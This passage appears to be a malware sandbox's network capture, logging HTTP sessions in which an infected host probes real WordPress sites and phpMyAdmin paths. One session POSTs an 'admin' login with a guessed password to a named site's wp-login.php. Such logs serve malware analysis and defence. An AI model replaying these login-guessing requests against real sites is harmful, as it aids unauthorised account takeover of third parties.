class="modal-body"><template id="template_cartlist_items"><div class="row"><div class="col-xs-4 col-sm-2"><img src="https://static.unpr.io/_gfx/cleardot.gif"></div><div class="col-xs-6 col-sm-5"><a href="{cart_item
2024-02-20 23:26:24 UTC	2048	IN	Data Raw: 37 46 34 0d 0a 65 6c 6c 22 3e 0a 0a 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 22 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 4f 6f 70 73 21 20 3c 73 6d 61 6c 6c 3e 34 30 34 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0a 09 09 09 09 56 69 20 66 61 6e 74 20 64 65 73 73 76 65 72 72 65 20 69 6b 6b 65 20 73 69 64 65 6e 20 64 75 20 6c 65 74 74 65 20 65 74 74 65 72 2e 0a 09 09 09 09 3c 62 72 3e 3c 62 72 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 61 72 67 65 74 3d 22 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 20 62 74 6e 2d 6d 64 22 3e 47 e5 20 74 69 6c 20 73 74 61 72 74 73 69 64 Data Ascii: 7F4ell"><h1 style="font-size:60px" class="text-center">Oops! <small>404</small></h1><div class="text-center">Vi fant dessverre ikke siden du lette etter.<br><br><a href="/" target="" class="btn btn-primary btn-md">G til startsid

Session ID	Source IP	Source Port	Destination IP	Destination Port
314	192.168.2.6	59422	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:23 UTC	185	OUT	GET /wp-login.php HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:23 UTC	810	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 x-frame-options: SAMEORIGIN set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ar%2BF4hbJC2VuOL9W3pXpqNlJOWf0a%2FSOvuPtc%2Fd73thzIyAKcbjKqN1oVMO3n9bIJqmCqBIHyuoohH%2B8niGPPH38PBi3xSd6%2FQYmKpP9n9plLawJ4JkBpwo86sR2QD%2Ffcy5eJtoBMKn40A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a83a5e9317286-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:26:23 UTC	559	IN	Data Raw: 31 61 30 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 46 6f 72 74 72 65 73 73 20 52 65 61 6c 20 43 61 70 69 74 61 6c 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 Data Ascii: 1a06<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Fortress Real Capital — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='
2024-02-20 23:26:23 UTC	1369	IN	Data Raw: 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d Data Ascii: el='stylesheet' id='forms-css' href='https://fortressrealcapital.com/wp-admin/css/forms.min.css?ver=6.4.3' type='text/css' media='all' /><link rel='stylesheet' id='l10n-css' href='https://fortressrealcapital.com/wp-admin/css/l10n.min.css?ver=6.4.3' type=
2024-02-20 23:26:23 UTC	1369	IN	Data Raw: 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 22 3e 50 6f 77 65 72 65 64 20 62 79 20 57 6f 72 64 50 72 65 73 73 3c 2f 61 3e 3c 2f 68 31 3e 0a 09 0a 09 09 3c 66 6f 72 6d 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 20 69 64 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 3e 55 73 65 72 6e 61 6d 65 20 6f 72 20 45 6d 61 69 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 69 6e 70 75 74 20 Data Ascii: ><a href="https://wordpress.org/">Powered by WordPress</a></h1><form name="loginform" id="loginform" action="https://fortressrealcapital.com/wp-login.php" method="post"><p><label for="user_login">Username or Email Address</label><input
2024-02-20 23:26:23 UTC	1369	IN	Data Raw: 6c 75 65 3d 22 31 22 20 2f 3e 0a 09 09 09 3c 2f 70 3e 0a 09 09 3c 2f 66 6f 72 6d 3e 0a 0a 09 09 09 09 09 3c 70 20 69 64 3d 22 6e 61 76 22 3e 0a 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 77 70 2d 6c 6f 67 69 6e 2d 6c 6f 73 74 2d 70 61 73 73 77 6f 72 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 3f 61 63 74 69 6f 6e 3d 6c 6f 73 74 70 61 73 73 77 6f 72 64 22 3e 4c 6f 73 74 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 3f 3c 2f 61 3e 09 09 09 3c 2f 70 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 66 75 6e 63 74 69 6f 6e 20 77 70 5f 61 74 74 Data Ascii: lue="1" /></p></form><p id="nav"><a class="wp-login-lost-password" href="https://fortressrealcapital.com/wp-login.php?action=lostpassword">Lost your password?</a></p><script type="text/javascript">/* <![CDATA[ */function wp_att
2024-02-20 23:26:23 UTC	1369	IN	Data Raw: 72 3d 33 2e 31 2e 32 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 69 6e 65 72 74 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 72 65 67 65 6e 65 72 61 74 6f 72 2d 72 75 6e 74 69 6d 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 30 2e 31 34 2e 30 22 20 69 64 3d 22 72 65 67 65 6e 65 72 61 74 6f 72 2d 72 75 6e 74 69 6d 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 Data Ascii: r=3.1.2" id="wp-polyfill-inert-js"></script><script type="text/javascript" src="https://fortressrealcapital.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0" id="regenerator-runtime-js"></script><script type="text/javascript" src="ht
2024-02-20 23:26:23 UTC	635	IN	Data Raw: 64 65 72 73 63 6f 72 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 77 70 2d 75 74 69 6c 2d 6a 73 2d 65 78 74 72 61 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 5f 77 70 55 74 69 6c 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 61 6a 61 78 22 3a 7b 22 75 72 6c 22 3a 22 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 7d 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 69 6e Data Ascii: derscore-js"></script><script type="text/javascript" id="wp-util-js-extra">/* <![CDATA[ /var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};/ ... */</script><script type="text/javascript" src="https://fortressrealcapital.com/wp-in
2024-02-20 23:26:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
315	192.168.2.6	59162	13.232.255.130	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:23 UTC	354	OUT	POST /wp-login.php HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://amsantechnology.com/wp-login.php Content-Length: 134 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:23 UTC	134	OUT	Data Raw: 6c 6f 67 3d 61 64 6d 69 6e 26 70 77 64 3d 65 64 65 34 64 65 6c 65 63 35 61 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 61 6d 73 61 6e 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=admin&pwd=ede4delec5a&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Famsantechnology.com%2Fwp-admin%2F&testcookie=1
2024-02-20 23:26:24 UTC	375	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:23 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:24 UTC	6582	IN	Data Raw: 31 39 61 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 41 6d 73 61 6e 20 54 65 63 68 6e 6f 6c 6f 67 79 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 Data Ascii: 19a9<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Amsan Technology — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='style

Session ID	Source IP	Source Port	Destination IP	Destination Port
316	192.168.2.6	59516	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:23 UTC	184	OUT	GET /phpmyadmin/ HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:24 UTC	1342	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:24 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-ob_mode: 1 x-frame-options: DENY referrer-policy: no-referrer content-security-policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-content-security-policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-webkit-csp: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; x-xss-protection: 1; mode=block x-content-type-options: nosniff x-permitted-cross-domain-policies: none x-robots-tag: noindex, nofollow expires: Tue, 20 Feb 2024 23:26:24 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 pragma: no-cache vary: Accept-Encoding set-cookie: pma_lang_https=en; expires=Thu, 21-Mar-2024 23:26:24 GMT; Max-Age=2592000; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict set-cookie: phpMyAdmin_https=v9qkgod3ikn4df2eqtt58f8s6s; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict
2024-02-20 23:26:24 UTC	499	IN	Data Raw: 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 32 30 20 46 65 62 20 32 30 32 34 20 32 33 3a 32 36 3a 32 34 20 47 4d 54 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 51 33 72 6a 73 79 6b 65 76 30 50 41 53 31 33 4f 4e 6b 4e 34 52 43 52 55 75 5a 30 4a 76 25 32 42 70 75 6e 58 54 73 47 77 67 54 7a 62 70 35 44 64 25 32 42 38 65 6b 30 70 72 6a 65 53 39 38 58 78 55 4f 7a 71 52 6f 62 7a 66 66 6c 76 52 66 68 52 6a 78 67 36 4c 25 32 42 4a 31 77 74 5a 4d 37 36 74 4e 4d 35 53 43 25 32 46 Data Ascii: last-modified: Tue, 20 Feb 2024 23:26:24 GMTCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q3rjsykev0PAS13ONkN4RCRUuZ0Jv%2BpunXTsGwgTzbp5Dd%2B8ek0prjeS98XxUOzqRobzfflvRfhRjxg6L%2BJ1wtZM76tNM5SC%2F
2024-02-20 23:26:24 UTC	1369	IN	Data Raw: 34 37 64 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 47da<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:24 UTC	1369	IN	Data Raw: 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 61 6a 61 78 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6b 65 79 68 61 6e 64 6c 65 72 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 Data Ascii: src="js/dist/ajax.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/keyhandler.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/jquery/jquery-ui.min.js?v=5.2.1"></script>
2024-02-20 23:26:24 UTC	1369	IN	Data Raw: 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 64 6f 63 6c 69 6e 6b 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 66 75 6e 63 74 69 6f 6e 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a Data Ascii: <script data-cfasync="false" type="text/javascript" src="js/dist/doclinks.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/functions.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="j
2024-02-20 23:26:24 UTC	1369	IN	Data Raw: 6a 73 2f 64 69 73 74 2f 63 6f 64 65 6d 69 72 72 6f 72 2f 61 64 64 6f 6e 2f 6c 69 6e 74 2f 73 71 6c 2d 6c 69 6e 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f Data Ascii: js/dist/codemirror/addon/lint/sql-lint.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/tracekit.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/error_report.js?v=5.2.1"></
2024-02-20 23:26:24 UTC	1369	IN	Data Raw: 6c 6f 73 65 54 65 78 74 20 3d 20 27 44 6f 6e 65 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 70 72 65 76 54 65 78 74 20 3d 20 27 50 72 65 76 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6e 65 78 74 54 65 78 74 20 3d 20 27 4e 65 78 74 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 63 75 72 72 65 6e 74 54 65 78 74 20 3d 20 27 54 6f 64 61 79 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6d 6f 6e 74 68 4e 61 6d 65 73 20 3d 20 5b 0a 20 20 20 20 27 4a 61 6e 75 61 72 79 27 2c 0a 20 20 20 20 27 46 65 62 72 75 61 72 79 27 2c 0a 20 20 20 20 27 4d 61 72 63 68 27 2c 0a 20 20 20 20 Data Ascii: loseText = 'Done'; $.datepicker.regional[''].prevText = 'Prev'; $.datepicker.regional[''].nextText = 'Next'; $.datepicker.regional[''].currentText = 'Today'; $.datepicker.regional[''].monthNames = [ 'January', 'February', 'March',
2024-02-20 23:26:24 UTC	1369	IN	Data Raw: 27 27 5d 2e 73 65 63 6f 6e 64 54 65 78 74 20 3d 20 27 53 65 63 6f 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 5c 75 30 30 32 30 69 73 5c 75 30 30 32 30 72 65 71 75 69 72 65 64 27 2c 0a 20 20 20 20 72 65 6d 6f 74 65 3a 20 27 50 6c 65 61 73 65 5c 75 30 30 32 30 66 69 78 5c 75 30 Data Ascii: ''].secondText = 'Second'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020field\u0020is\u0020required', remote: 'Please\u0020fix\u0
2024-02-20 23:26:24 UTC	1369	IN	Data Raw: 61 78 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 Data Ascii: ax: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equal\u0020to\u0020\u007B
